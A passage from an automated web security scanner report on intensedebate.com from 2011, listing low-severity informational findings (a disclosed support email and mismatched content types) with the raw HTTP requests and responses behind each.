GET /remoteCheckin.php?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570781 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:17 GMT
Content-Type: image/gif
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58

BM:.......6...(...........................................

3. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /js/genericCommentWrapper2.php HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 183

document.write('We\'re having issues locating the IntenseDebate account for this blog. Please email our <a href="mailto:support@intensedebate.com">support team</a> for assistance.');

4. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


4.1. http://intensedebate.com/js/genericCommentWrapper2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/genericCommentWrapper2.php?acct=c50f2a764aa1b8f5871c7859edc4846b&postid=http%3A%2F%2Fferruh.mavituna.com%2Fsql-injection-cheatsheet-oku%2F&title=SQL%20Injection%20Cheat%20Sheet&url=http%3A%2F%2Fferruh.mavituna.com%2Fsql-injection-cheatsheet-oku%2F HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 1546

var IDCommentScript=document.createElement("script");IDCommentScript.type="text/javascript";IDCommentScript.src = "http://intensedebate.com/comment/c50f2a764aa1b8f5871c7859edc4846b/generic/79084072";v
...[SNIP]...

4.2. http://intensedebate.com/js/getUserMenu.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/getUserMenu.php HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 1102

var str='{ "rtype": 1, "parent_div_id":"", "userid":0, "htmloutput":"        <div class=\\\"idc-m-avatar\\\">            <a href=\\\"\\\" target=\\\"_blank\\\"><img src=\\\"\\\" alt=\\\"\\\'s avatar\\\" class=\\\"id
...[SNIP]...

4.3. http://intensedebate.com/remoteCheckin.php  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intensedebate.com
Path:   /remoteCheckin.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /remoteCheckin.php?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570781 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:17 GMT
Content-Type: image/gif
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58

BM:.......6...(...........................................

Report generated by XSS.CX at Sun Mar 13 07:33:35 CDT 2011.